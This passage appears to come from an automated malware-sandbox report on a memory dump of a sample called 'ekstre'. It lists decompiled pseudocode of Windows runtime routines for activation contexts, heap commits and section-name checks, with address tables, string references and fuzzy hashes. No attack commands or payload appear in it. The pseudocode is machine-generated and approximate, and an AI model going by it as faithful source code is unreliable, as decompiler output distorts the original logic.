						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E34170690) {
					 *0x342691e0();
					_t50 =  *_t73();
				} else {
					_t50 = E34170690();
				}
				_t84 = _t50;
				goto L4;
			}

0x3417048f
0x34170493
0x3417049a
0x341704a0
0x341704a3
0x341704a6
0x341704af
0x341704b8
0x341704c2
0x341704cb
0x341704ce
0x341704d2
0x341704d6
0x3417060e
0x34170610
0x34170618
0x00000000
0x00000000
0x341704ef
0x341704ef
0x341704f2
0x341705e3
0x341705ea
0x341705f1
0x341705f1
0x34170501
0x34170501
0x34170504
0x3417050c
0x34170519
0x3417051b
0x00000000
0x341ce99c
0x341ce9a2
0x341ce9ac
0x3417051f
0x3417052a
0x341ce9b9
0x341705cd
0x341705d3
0x341705d3
0x341ce9bf
0x3417053c
0x3417054d
0x34170559
0x34170562
0x341ce9ce
0x341ce9ce
0x3417056a
0x3417057b
0x34170580
0x34170580
0x3417058f
0x34170597
0x34170598
0x3417059d
0x341705a1
0x341705a5
0x341705ad
0x341705b3
0x341ce9dd
0x00000000
0x341ce9ed
0x00000000
0x341ce9ed
0x341ce9dd
0x341705b9
0x341705be
0x341705c7
0x341ce9f2
0x341ce9f2
0x341705c7
0x00000000
0x341705ad
0x00000000
0x341ce9b2
0x3417050c
0x341704fb
0x341ce989
0x341ce990
0x00000000
0x341ce990
0x00000000
0x341704fb
0x341704dc
0x341704e2
0x341705d6
0x341705dc
0x341704e8
0x341704e8
0x341704e8
0x341704ed
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 341705D6

Strings

kLsE, xrefs: 341705FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34170586

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 061b6d5582373969c976fa8c983d651b66f1aa1aaf573322a278b8bff86187e0
Instruction ID: fe91d3c7b86dd824ed477f451ca4d03243721ef0fc28d70e46c3f78800b0f5e0
Opcode Fuzzy Hash: 061b6d5582373969c976fa8c983d651b66f1aa1aaf573322a278b8bff86187e0
Instruction Fuzzy Hash: 6C519BB5A00B46DFEB20DFA4C4C46AABFE8AF45304F00857ED59993240EB74D945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 341A265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E341A265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x3426b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x3414120c) {
					E341FEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return L341B4B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E341FEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									L34183B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = E34185D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E341A33D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E34169303(_t129);
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E34185D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									L341B88C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x341a265c
0x341a266e
0x341a2675
0x341a267b
0x341a2685
0x341a268b
0x341a2691
0x341a2697
0x341a269b
0x341a26a1
0x341a26a8
0x341a26aa
0x341a26b3
0x341a26b4
0x341a26bb
0x341a26be
0x341a26c4
0x341a26ca
0x341a26d5
0x341e1ff1
0x341e1ff9
0x341a2906
0x341a2916
0x341a2916
0x341a26e1
0x341a26e9
0x341a26eb
0x341a26eb
0x341a26f3
0x341a26fb
0x341a26fd
0x341a26fd
0x341a2705
0x341a270d
0x341a270f
0x341a270f
0x341a271b
0x341e20a8
0x341e20ae
0x341e20b4
0x341e20b5
0x341e20c9
0x341e20d1
0x00000000
0x341a2741
0x341a2743
0x341a2813
0x341a283c
0x341a283c
0x341a283c
0x341a2842
0x341a2844
0x341a2844
0x341a284a
0x341a2850
0x341a2858
0x341a28d2
0x341a28d2
0x341a28d4
0x341a28d4
0x341a28da
0x341a28e4
0x341a28e6
0x341a28ee
0x341a28f0
0x341a28f0
0x341a28f2
0x341a28f4
0x341a28f6
0x341e20e2
0x341e20e2
0x00000000
0x341a28f6
0x341a285d
0x341a285f
0x341a285f
0x341a2863
0x341a2869
0x341a2871
0x341e205d
0x00000000
0x341e205d
0x341a288e
0x341a2892
0x341e2067
0x341e2080
0x341e2080
0x00000000
0x341e2080
0x341a2898
0x341a289b
0x341a28a1
0x341a28a6
0x341a28aa
0x341e207b
0x00000000
0x341e207b
0x341a28b0
0x341a28ba
0x341a28c0
0x341e208d
0x341e209e
0x341e209e
0x341a28c6
0x341a28cc
0x341a28cc
0x00000000
0x341a2863
0x341a281c
0x00000000
0x00000000
0x341a2822
0x341a2822
0x341a2825
0x341a2829
0x341e2003
0x00000000
0x341e2003
0x341a2832
0x341a2834
0x00000000
0x341a2834
0x341a2749
0x341a274c
0x00000000
0x341a275f
0x341a2761
0x341e2014
0x00000000
0x00000000
0x341e201a
0x341a2767
0x341a2767
0x341a276d
0x341a276f
0x341a276f
0x341a2775
0x341a277b
0x341a2783
0x00000000
0x00000000
0x341a278c
0x341a2791
0x341a2797
0x00000000
0x00000000
0x341a279d
0x341a27a0
0x341a27a5
0x341a27a8
0x341a27ab
0x341a27ae
0x341a27b4
0x341a27b4
0x341a27b9
0x341e2024
0x341e2033
0x341e2043
0x341e2045
0x341e204d
0x341a27d2
0x341a27d5
0x341a27e8
0x341a27ee
0x341a27fd
0x341a27fe
0x341a27ff
0x341a2800
0x341a2802
0x341a2808
0x00000000
0x341a2808
0x341e2053
0x00000000
0x341e2053
0x341e2026
0x00000000
0x341e2026
0x341a27bf
0x341a27c5
0x341a27cc
0x00000000
0x341a27cc
0x341a274c

Strings

.Local, xrefs: 341A27F8
SXS: %s() passed the empty activation context, xrefs: 341E1FE8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 341E20C0
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 341E1FE3, 341E20BB

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 7e81c7bca6a011802a62ac49245526e2e7b337e81363afed8774b03993afffa4
Instruction ID: 25d919ab4ebdcdc30064d6a6aaa7bba59f5212666a45e86d9f62b4e8c1237a7a
Opcode Fuzzy Hash: 7e81c7bca6a011802a62ac49245526e2e7b337e81363afed8774b03993afffa4
Instruction Fuzzy Hash: B1A18B79A40B299BEB20CF64D8C4B99F3B5BF58354F1101EAE808A7391D7309E95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 3416F5C7 Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E3416F5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E3416F858(__edx,  &_v36,  &_v40);
				if(L341A68EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						L3416B910();
					} else {
						L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					L3416B910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push("true");
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = L341B2BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E34235FED(0, _t136, "true",  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push(0x1000);
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E341B2B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E34183C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E3422EFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E34183C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E34183C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E3422F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E34183C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E34183C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E3422F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E341C8140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}

0x3416f5cf
0x3416f5d9
0x3416f5e0
0x3416f5e3
0x3416f607
0x341ce162
0x341ce167
0x341ce167
0x341ce16d
0x341ce173
0x341ce177
0x341ce2dd
0x341ce2e2
0x341ce17d
0x341ce192
0x341ce197
0x341ce2e8
0x341ce2ec
0x341ce2f0
0x341ce2f7
0x341ce2ff
0x3416f6ba
0x3416f6c0
0x3416f6c0
0x3416f614
0x341ce19f
0x341ce1a0
0x341ce1a2
0x341ce1a8
0x341ce1a9
0x341ce1ab
0x341ce1ac
0x341ce1ae
0x341ce1b3
0x341ce1b5
0x341ce1c8
0x341ce1d6
0x00000000
0x341ce1d6
0x341ce1b7
0x341ce1bc
0x00000000
0x00000000
0x341ce1be
0x341ce1c2
0x3416f61d
0x3416f61d
0x3416f61e
0x3416f627
0x3416f628
0x3416f62e
0x3416f62f
0x3416f631
0x3416f636
0x3416f63a
0x00000000
0x00000000
0x3416f640
0x3416f645
0x3416f64c
0x341ce1e9
0x3416f652
0x3416f652
0x3416f652
0x3416f657
0x341ce1f3
0x341ce1f9
0x341ce200
0x341ce212
0x341ce212
0x341ce200
0x3416f661
0x3416f667
0x3416f674
0x341ce225
0x3416f67a
0x3416f67a
0x3416f67a
0x3416f67f
0x341ce22f
0x341ce235
0x341ce23c
0x341ce247
0x341ce249
0x341ce254
0x341ce254
0x341ce254
0x341ce26f
0x341ce26f
0x341ce23c
0x3416f685
0x3416f68a
0x3416f691
0x341ce282
0x3416f697
0x3416f697
0x3416f697
0x3416f69c
0x341ce291
0x341ce293
0x341ce29e
0x341ce29e
0x341ce29e
0x341ce2b9
0x341ce2b9
0x3416f6a2
0x3416f6a8
0x3416f6ad
0x341ce2d0
0x341ce2d5
0x341ce2d5
0x3416f6b5
0x3416f6b8
0x00000000
0x3416f6b8
0x00000000
0x341ce1c2
0x3416f61a
0x3416f61c
0x00000000

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 341CE2F2
HEAP[%wZ]: , xrefs: 341CE18D
HEAP: , xrefs: 341CE2DD
`, xrefs: 341CE1B7

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 3e748e4dba64f27b370d5e534722ed3854e40a74d0862f8f05e892c4b7e09b9f
Instruction ID: b06761af33e60c8e3cf0aadf9a18a048d689b5a04bda082ba67c7754fcdc2620
Opcode Fuzzy Hash: 3e748e4dba64f27b370d5e534722ed3854e40a74d0862f8f05e892c4b7e09b9f
Instruction Fuzzy Hash: B361E075204B809FE321CB64CCC4F57B7E9EB94754F0508A9F9559B291CB38E820CB62

Uniqueness

Uniqueness Score: -1.00%

Function 341690F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 341CB82F, 341CB86C
HEAP: , xrefs: 341CB83C, 341CB879
VirtualQuery Failed 0x%p %x, xrefs: 341CB886
VirtualProtect Failed 0x%p %x, xrefs: 341CB849

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 3c512a521c66a3832af693bd0e361f2cd479a31c3e219da9827107ea705eb2b4
Instruction ID: 3c74968b40f648b1361d3c7bdb7baba405f327e69dd65eb36351ae9906fa4af8
Opcode Fuzzy Hash: 3c512a521c66a3832af693bd0e361f2cd479a31c3e219da9827107ea705eb2b4
Instruction Fuzzy Hash: 5C31C376A40A14EFDB01CB94DCC8F9BB7B9EB44774F214099E816AB291DB34ED50CE60

Uniqueness

Uniqueness Score: -1.00%

Function 341F166E Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E341F166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E341B9EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E341B9EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E341B9EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E341B9EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}

0x341f167e
0x341f1680
0x341f1689
0x341f1691
0x341f1699
0x341f16a0
0x341f16a6
0x341f16b2
0x341f16b7
0x341f16ba
0x341f16bc
0x341f16c8
0x341f16ca
0x341f16d2
0x341f16d7
0x341f16dc
0x00000000
0x00000000
0x341f16e0
0x341f16ea
0x341f16ef
0x341f16f2
0x341f16f2
0x341f16f4
0x341f16f9
0x341f1703
0x341f1708
0x341f170b
0x341f170b
0x341f1710
0x341f1719
0x341f171f
0x341f1720
0x341f1729
0x00000000
0x00000000
0x341f172b
0x00000000
0x00000000
0x00000000
0x00000000
0x341f1710
0x00000000
0x341f16ca
0x341f172d
0x341f172d
0x341f1733
0x341f1741
0x341f1741
0x341f1746
0x341f174a

Strings

stxt371, xrefs: 341F16CC
.txt, xrefs: 341F16E4
BoG_ *90.0&!! Yy>, xrefs: 341F1693
.txt2, xrefs: 341F16FD

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
API String ID: 0-1880532218
Opcode ID: 2403d5c6f635c3da813691f170185c41a34d64003dfe225abb3c9c46929b4ad7
Instruction ID: d7cc4e6352a46fd99a9ab3c52f5ea65ef051a6c6e0fe45755c55d3cb59c45bb2
Opcode Fuzzy Hash: 2403d5c6f635c3da813691f170185c41a34d64003dfe225abb3c9c46929b4ad7
Instruction Fuzzy Hash: BA21247AE41E00ABD7428B58DCC1ADAB3F5AF45744F0942A9E849A7341EB75ED03CB50

Uniqueness

Uniqueness Score: -1.00%

Function 34177072 Relevance: 4.7, APIs: 3, Instructions: 158
timeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E34177072(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				signed int* _t58;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t106;
				void* _t112;
				intOrPtr _t113;

				_t112 = __edx;
				_v24 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t113 =  *((intOrPtr*)(__edx + 0x58));
				if(_t113 != 0) {
					_push( &_v16);
					_push(0);
					_push(0);
					E341A85E0(_t86, __edx, __edx, _t113, __eflags);
				}
				_t87 = _t112 + 0x8c;
				_t92 =  *_t87;
				do {
					_t106 = _t92;
					_t51 = _t92 >> 1;
					if(_t51 == 0) {
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
					} else {
						_v12 = 1;
						_v8 = 1;
						if((_t92 & 0x00000001 | _t51 * 0x00000002 - 0x00000002) < 2) {
							_v8 = _v8 & 0x00000000;
						}
					}
					asm("lock cmpxchg [ebx], ecx");
					_t92 = _t106;
				} while (_t92 != _t106);
				_t88 = _t87 | 0xffffffff;
				if(_t113 != 0) {
					__eflags = _v12;
					if(__eflags != 0) {
						__eflags = E34192120(_t88, _t92, 0, _t113);
						if(__eflags >= 0) {
							_t82 = _v24;
							_t33 = _t82 + 0x50;
							 *_t33 =  *(_t82 + 0x50) | 0x00000100;
							__eflags =  *_t33;
							 *((intOrPtr*)(_t82 + 0x64)) = _t113;
						} else {
							_v12 = _v12 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_v20 = 1;
						}
					}
					_push(_v16);
					_push(0);
					E341AA6D0(_t88, _t112, _t113, __eflags);
					__eflags = _v20;
					if(_v20 != 0) {
						L3419DB40(_t112 + 0x20, _t88, 0);
						E34244600(_t112);
					}
				}
				if(_v8 != 0) {
					_push(2);
					asm("lock xadd [edi], eax");
					_t55 = E34183C40();
					__eflags = _t55;
					if(_t55 != 0) {
						_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t58 = 0x7ffe0386;
					}
					__eflags =  *_t58;
					if( *_t58 != 0) {
						L34244BE0( *((intOrPtr*)(_t112 + 0x5c)), _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x30)),  *((intOrPtr*)(_t112 + 0x34)),  *((intOrPtr*)(_t112 + 0x3c)));
					}
					E34181C8F(_t88, _t112 + 0x78,  *((intOrPtr*)(_t112 + 0x5c)), _t112,  *((intOrPtr*)(_t112 + 0x74)), 0);
					asm("lock xadd [edi], eax");
					if(__eflags == 0) {
						 *0x342691e0(_t112);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
					}
				}
				if(_a4 != 0) {
					__eflags = E34171F36(0);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t112 + 0x70)) = _v0;
						asm("lock xadd [edi], eax");
						if(__eflags == 0) {
							 *0x342691e0(_t112);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
						}
					}
				}
				if(_v12 != 0) {
					E34177007(_v24, _t112);
					return 1;
				}
				asm("lock xadd [edi], ebx");
				__eflags = _t88 == 1;
				if(_t88 == 1) {
					 *0x342691e0(_t112);
